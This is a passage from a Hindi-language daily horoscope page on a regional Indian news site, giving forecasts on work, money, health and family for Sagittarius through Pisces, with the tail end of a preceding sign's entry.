आज आपको सेहत के प्रति समझौता नहीं करना है। यदि आप किसी मांगलिक कार्यक्रम में जाएं,तो वहां भी आपको अत्यधिक तले भुने भोजन करने से बचना होगा,जो आपके लिए कोई नुकसानदायक हो सकता हैं। आज आप अपनी वाणी के कारण मुसीबत में आ सकते हैं,क्योंकि कार्यक्षेत्र में आप अपने किसी अधिकारी से ज्यादा बोल सकते हैं,जो आपके लिए समस्या लेकर आएगा और यदि आपने किसी काम में लापरवाही दिखाई,तो बाद में आपको इसके लिए समस्या हो सकती है। आप कार्यक्षेत्र से जुड़े कुछ निर्णय बहुत ही सूझबूझ से लेकर लोगों को आश्चर्यचकित कर सकते हैं।

धनु राशिफल (Sagittarius Horoscope)

आज का दिन कारोबार कर रहे लोगों के लिए उत्तम रहने वाला है। आप संतान की शिक्षा में आ रही समस्याओं को लेकर उनके गुरुजनों से बातचीत करेंगे,तो जीवन में सरसता बनी रहेगी और आपकी सूझबूझ से लिया गया कोई निर्णय आपके लिए खुशी लेकर आ सकता है। स्थायित्व को बल मिलने से प्रसन्न रहेंगे। आप खान पान में लापरवाही न बरतें। इसीलिए योग व व्यायाम पर पूरा जोर दें और उन्हें अवश्य करें,तभी आप अपने शरीर को स्वस्थ्य रख पाएंगे। बिजनेस की योजना बना रहे लोगों के लिए आज का दिन अच्छा रहेगा।

मकर राशिफल (Capricorn Horoscope)

आज का दिन आपके लिए मेहनत व लगन से किसी कार्य को पूरा करने के लिए रहेगा। आपको आज नौकरी में यदि अधिकारी कोई जिम्मेदारी सौंपे,तो उसमें लापरवाही बिल्कुल ना बरतें और खर्चो पर आप अंकुश लगाए रखें,तभी आप भविष्य के लिए कुछ सेविंग करने में कामयाब रहेंगे और यदि आपने पहले से किसी से धन उधार लिया था,तो वह भी आपसे वापस मांग सकता है,जिसके बाद आप काफी हद तक रिलैक्स महसूस करेंगे,लेकिन आपकी कुछ जिम्मेदारियां आज आपके लिए कोई नई समस्या लेकर आ सकती हैं फिर भी आप उन्हें बखूबी निभाएंगे।

कुंभ राशिफल  (Aquarius Horoscope)

आज का दिन आप आर्थिक मामलों में सजग रहेंगे,क्योंकि आपके कुछ धन संबंधित मामले आपके लिए नई समस्या लेकर आ सकते हैं और आपका ध्यान अध्ययन के प्रति रुचि बढ़ने से आपका मन प्रसन्न रहेगा। आपको आज कोई काम सहजता से करना होगा,तभी वह समय पर पूरा हो पाएगा। सरकारी नौकरी से जुड़े जातकों को प्रमोशन मिल सकता है,जिसके बाद वह एक स्थान से दूसरे स्थान पर जा सकते हैं। आप अपने मनोबल को ऊंचा करके अपनी सोच में कुछ बदलाव लाएंगे,जिससे संतान भी आपकी बातों से प्रसन्न रहेगी।

मीन राशिफल (Pisces Horoscope)
आज का दिन आपके लिए सुख समृद्धि दिलाने वाला रहेगा। लेकिन आप अपने घर में चल रहे वाद-विवाद को आप परेशान रहेंगे,जो आपके किसी करीबी की मदद से समाप्त हो सकता है,जिससे परिजनों के बीच नजदीकियां आएगी। आप अपने परिवार के किसी सदस्य से किसी वस्तु के लिए जिद कर सकते हैं और वह आपको अवश्य लाकर देंगे। आज आप वाहन बहुत ही सावधानी से चलाएं,नहीं तो कोई समस्या खड़ी हो सकती है। बिजनेस कर रहे लोगों के लिए दिन अच्छा रहने वाला है,क्योंकि वह अच्छा लाभ कमा सकते हैं।
Chaiपुर
Show More

Nation Update

Our Mission NATION UPDATE News is the Best Online News Channel in Chhattisgarh. News is at the very core of an informed citizen, it builds awareness about the happenings around and such awareness can be crucial in taking decisions on a normal working day. At NATION UPDATE News, We believe that every news starts with a voice, a voice with concern that wants to discuss or criticise what’s happening around. So before becoming news, it first becomes the voice of masses, that’s what news is at NATION UPDATE News.

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button

You cannot copy content of this page

Adblock Detected

Please consider supporting us by disabling your ad blocker